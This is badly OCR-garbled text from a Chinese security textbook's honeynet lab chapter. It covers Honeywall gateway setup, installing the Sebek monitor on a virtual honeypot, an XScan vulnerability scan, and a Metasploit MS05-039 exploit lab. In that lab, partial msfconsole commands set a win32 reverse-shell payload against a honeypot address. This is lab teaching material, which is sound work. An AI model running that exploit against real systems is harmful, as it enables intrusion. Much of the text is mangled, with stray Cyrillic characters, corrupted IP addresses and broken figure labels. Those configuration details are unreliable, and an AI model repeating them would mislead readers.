[rooBlocalho 


[Ay tow ds ot hove Wr 


2 


84 网 关 登 录 界 面 
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BüHoneywall — Viware Workstation 
t Ше W es Windows Help 
w o ав ое а 


Е Honeywall 


E Koneyrall 


Honeywall not configured 
This honcywall is mot yet 
configured. Please consider 
configuring it using the Honeywall 
Configuration option of the main 
menu. 


f You is nat have Wiiware Tools installed 


图 85 初始 设置 界面 
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View WM Tean Yindors 


Honeguall CD 
Main Menu 


1 Statu: 
2 OS Administration 
3 Honeywall ist 


5 Documentation 
6 Exit 
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图 826 配置 菜单 选择 界面 
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XLI rj Honeywat | 
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Initial Setup 
LIMITATION DF LIABILITY 

In mo event will The Honeynet Project be liable for any damages, 
including loss of data, lost profits, cost of cover, or other 
special, incidental, consequential, direct or indirect damages 
arising from the software or the use thereof, however caused and 
on any theory of liability. This limitation will apply even if The 
Honeynet Project has been advised of the possibility of such 
damage. By Clicking YES you acknowledge that this is a reasonable 
assumption of risk. 


[A You do ast Rave Weare Tocls іла Шей 


图 87 风险 声明 界面 


HEP RUE HE RC: 通过 命令 行 menu 进入 蜜 网 网 关 配置 界面 ,选择 4 Honeywall 
Configuration, 1 Mode and IP Information,2 Honeypot IP Address, 如 图 8. 28 所 示 。 通 过 添 
加 空格 来 分 隔 多 个 IP 地 址 ,目前 Коо 不 支持 网 络 中 具有 不 同 网 段 的 蜜 炙 TP 地 址 。 


Honeypot IP Address 
Enter the IP Address(es) of your Honeypot(s) 


192.168.8.4 192.168.8.5 


«Cancel? 


图 82B IP 地 址 设置 界面 


然后 ,选择 5 LAN Broadcast Address, 设 置 该 网 段 的 广播 IP 地 址 ,如 图 8. 29 所 示 。 


Honeywall 02226 


LAN Broadcast Address 
Enter the Broadcast address of the LAN 


192.168.8.255 


HEINE] — ee 


图 829 网 段 广 播 IP 地 址 设置 界面 


选择 6 LAN CIDR Prefix, 设 置 为 CIDR 格式 ,如 图 8. 30 所 示 。 


Local IP network 
CIDR Notation net prefix. EX. 
16.6.1.8724 


区 .168.8.4731 


GI <Cancel> 


图 830 蜜 网 网 段 设置 界面 
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蜜 网 网 关 管 理 配 置 : 进入 蜜 网 网 关 配 置 主 界面 ,选择 4 Honeywall Configuration, 
2 RemoteManagement,1 Management IP Address, 如 图 8. 31 所 示 。 


tp Honeywall munis ey 


Management Interface IP Address 
Enter the IP address of the management 
interface 


[зг .лвв.а.з 


k ok oj «Cancel» 


图 831 管理 口 IP 地 址 设置 界面 


选择 2 Management Netmask ,设置 IP 地 址 掩 码 , 如 图 8. 32 所 示 


Management Interface Network Mask 
Enter the Network Mask of the management 
interface 


[255.255.255.0 


GMI) <Cancel> 


图 8 SHO IP 地 址 捷 码 设置 界面 


选择 3 Management Gateway . iX 置 管理 口 网 关 , 如 图 8. 33 所 示 。 


Management Default Gateway 
Enter the IP address of the management 
default gateway. 


[192.160.1.1 


«Cancel 


ч аз 管理 口 网 关 地 址 设置 界面 
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选择 6 Management DNS Servers. it E DNS 服务 器 地 址 ,如 图 8. 34 所 示 。 


Management DNS Servers 


Enter a space delimited list of DNS 
Servers tn be used by the Managment 
Interface 


Ге -185.129.27_ Ш 


MUM) «ер 


图 834 管理 口 DNS 服务 器 地 址 设置 界面 


选择 7 Manager, 设 置 可 以 管理 蜜 网 网 关 的 远程 
可 有 多 个 ТР 网 段 ,中间 用 空格 分 隔 , 如 图 8. 35 所 示 。 


if 


Sig IP 范围 ,以 CIDR 格式 填写 ， 


Enter a space delimited list of IP 
addresses that can access the management 
interface 


[192-160.1-1724 


[n NEED 


图 83 被 管理 网 段 设置 界面 
Sebek 服务 器 端 配置 : 在 蜜 网 网 关 配 置 主 界面 中 .选择 4 Honeywall Configuration, 
11 Sebek, Sebek 服务 器 端 IP 地 址 设置 为 管理 口 IP ,目标 端口 选择 为 1101,Sebek 数据 包 
处 理 选择 为 Drop ,如 图 8. 36 所 示 。 


b Honeywall 


Configure Sebek Uariables 
Enter the destimation IP address of the 
sebek packets. 


[152-168.1.3_ 
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首先 ,使 用 SecureCR T 软件 测试 SSH 远程 管理 ,远程 SSH 连接 蜜 网 网 关 管理 口 ,如 
图 8. 37 所 示 。 
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图 83 ”SSH 远程 管理 设置 界面 
其 次 ,测试 Walleye 远程 访问 情况 ,如 图 8. 38、 图 8. 39 所 示 。 


)Honeywall Login Mozilla Firefor 
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图 838 远程 连接 Walee 界 面 
(5) 安装 虚拟 机 蜜 龟 。 

首先 ,新 建 虚拟 机 ,配置 虚拟 硬件 ,如 图 8. 40 所 示 。 
配置 虚拟 机 蜜 钢 的 网 络 接口 ,如 图 8.41 所 示 。 


测试 虚拟 机 蜜 负 和 宿主 主机 之 间 的 网 络 连 接 ,在 宿主 主机 上 ping 虚拟 机 蜜 色 IP, 如 
图 8. 42 所 示 为 宿主 主机 到 虚拟 机 的 连通 测试 。 


在 虚拟 机 蜜 缸 上 ping 宿主 主机 IP, 如 图 8. 43 所 示 为 虚拟 机 到 宿主 主机 的 连通 测试 
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图 840 虚拟 硬件 设置 界面 图 841 gd mE IP 地址 设置 界面 
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ianwei>ping 192 
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和 机 到 虚拟 机 的 连通 测试 


єс ping 19216802 t 


ийи 
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843 虚拟 机 到 宿主 主机 的 连通 测试 
在 蜜 网 网 关上 监听 ICMP ping 包 是 否 通过 外 网 口 和 内 网 口 : 


tcpdump - i ethO iam 

tcpdump - і ethl iam 

通过 测试 后 «i Ж PAEL E РЕ ТИЕР АПР Б Be 53 In] JB 

(6) ТЕЖЕ Е Sebek 客户 端 。 

将 Sebek-Win32-3. 0. 4. zipC http://www. savidtech. com/sebek/) 通 过 网 络 共享 复制 
到 虚拟 机 蜜 饶 中 ,解压 后 执行 Setup. ехе 进行 安装 。 

在 蜜 网 网 关 虚 拟 机 上 执行 ifconfig eth2, 得 到 管理 口 eth2 的 MAC 地 址 , 填 入 如 
图 8. 44 所 示 的 Sebek 服务 器 端 配置 对 话 框 。 
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Sebek Configuration Wizard — Server Configuration 


а the WP destination port to be configured an the Selih 
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图 844 监控 软件 设置 界面 
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随机 生成 或 填写 Magic Number. т f ШЕ [6] — 3 I] h i A ЖОЕ EL EEZ Sebek, 
H. Sebek 使 用 的 Magic Number 保持 一 致 ,使 得 Sebek 的 上 传 通 信 在 蜜 网 中 对 攻击 者 隐 
蔽 (即使 攻击 者 获取 了 蜜 缸 主机 的 控制 权 ,并 启用 网 络 监听 器 进行 监听 ) 。 重 新 启动 主机 ， 
建立 Snapshot。 至 此 ,整个 虚拟 蜜 网 搭建 环节 全 部 结束 。 

实验 报告 要 求 

。 实验 目的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 

。 阐述 碰 到 的 问题 以 及 解决 方法 。 

。 阐述 收获 与 体会 。 


8.3 漏洞 扫描 实验 


实验 器 材 

。 蜜 网 综合 环境 1 套 。 

* PC(Windows XP/Windows 7)1 #7. 

预习 要 求 

。 做 好 实验 预习 ,复习 虚拟 蜜 网 技术 的 有 关内 容 。 

* 熟悉 虚拟 蜜 网 的 使 用 方法 。 

。 熟悉 实验 过 程 和 基本 操作 流程 。 

。 做 好 预习 报告 。 

实验 任务 

掌握 利用 虚拟 蜜 网 技术 进行 系统 漏洞 扫描 的 方法 。 

实验 环境 

操作 系统 为 Windows XP 的 PC 一 台 。 

预备 知识 

。 蜜 网 技术 。 

。 虚拟 蜜 网 原理 。 

实验 步骤 

CD 在 攻击 机 ( 即 宿主 主机 ) 上 运行 XScan 漏洞 扫描 工具 对 192. 168. 0. 4 ЖЕ 
实施 漏洞 扫描 ,如 图 8.45 所 示 。 

(2) 在 蜜 网 网 关上 对 XScan 漏洞 扫描 过 程 中 的 每 个 网 络 连接 都 进行 了 完备 的 记录 ， 
从 如 图 8. 46 所 示 的 蜜 网 网 关 数 据 摘 要 视图 可 发 现 正在 扫描 的 192. 168. 0. 2 攻击 机 IP, 
图 8.47 则 显示 了 其 扫描 的 每 个 网 络 连接 详细 信息 。 

实验 报告 要 求 

， 实 验 目的 。 
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Notes: Peking University Jianvai's Honeynet 


Activity Report 


Top 10 Remote Hosts 


ns 105 events Host Connections ^ 105 events 

° 192.168.0.2 E 236 
72.31,5.20 126 60 
392.169.0.1 iss sé 

Top 10 Destination Ports 
Port Connections 105 events 

© 199 357 198 

5 445 205 155 

+ 161 27 

+ 135 24 

з 177 1 

2 1434 1 

2 5622 1 

2 162 1 

2 21 197 ° 

2 32789 14 n 


End 


1P Proto 
Either 
Prefix Port d ] 
Source prefix Port [] ] 
Destination 7 
Prefix Port 
Result Format irm ш 


Ej 846 蜜 网 网 关 捕获 的 漏洞 扫描 过 程 的 摘要 视图 
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图 847 扫描 网 络 连接 视图 


。 附 上 实验 过 程 的 截图 和 结果 截图 。 
。 阐述 碰 到 的 问题 以 及 解决 方法 。 
。 阐述 收获 与 体会 。 


8.4 渗透 攻击 实验 


实验 器 材 
。 虚拟 蜜 网 软件 综合 系统 1 套 。 
* PC(Windows XP/Windows 7)1 £. 


预习 要 求 


* 做 好 实验 预习 ,复习 虚拟 蜜 网 技术 的 有 关内 容 。 
”熟悉 虚拟 蜜 网 的 使 用 方法 。 

。 熟悉 实验 过 程 和 基本 操作 流程 。 

。 做 好 预习 报告 。 


实验 任务 
掌握 利用 虚拟 蜜 网 技术 进行 系统 渗透 攻击 扫描 的 方法 。 


实验 环境 
操作 系统 为 Windows XP 的 PC 一 台 。 
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预备 知识 
。 蜜 网 技术 。 
www. metasploit. com 


* 虚拟 蜜 网 原理 。 


CD 在 宿主 主机 上 安装 Metasploit 渗透 攻击 工具 : 从 http: 
projects/Framework/downloads. html 下 载 Metasploit Framework 2. 6 for Windows 并 
3t 
主 主机 的 个 


GE: mt H 


(2) Metasploit 渗透 攻击 测试 : 运行 MSFConsole, 输 入 针对 MS05-039 即 插 即 用 服 
) 


安装 。 
Xu i 
务 漏洞 的 渗透 攻击 命令 ,获得 反 向 的 Shell, 如 图 8. 48 所 示 
人 防火 墙 , 如 微软 防火 墙 ,使 得 能 够 接收 4444 端口 的 连 入 
pnp<wind2_bind> > set PAYLOAD uin32 rever 
2 et RHOST 192.168.8.4 
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C30 eb ра р) SE ic А ЕИ ВС E GT ST ,验证 蜜 网 的 攻击 数据 捕获 和 分 析 功 能 ,如 
图 8.49 至 图 8.54 Bra. 
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849 蜜 网 网 关 对 渗透 攻击 测试 的 摘要 视图 
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图 851 向 外 发 起 的 反 向 е 连接 
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实验 报告 要 求 


实验 目的 。 


图 853 反 向 Shal 连接 中 的 键 击 记 录 


附 上 实验 过 程 的 截图 和 结果 截图 。 
阐述 碰 到 的 问题 以 及 解决 方法 。 


阐述 收获 与 体会 。 
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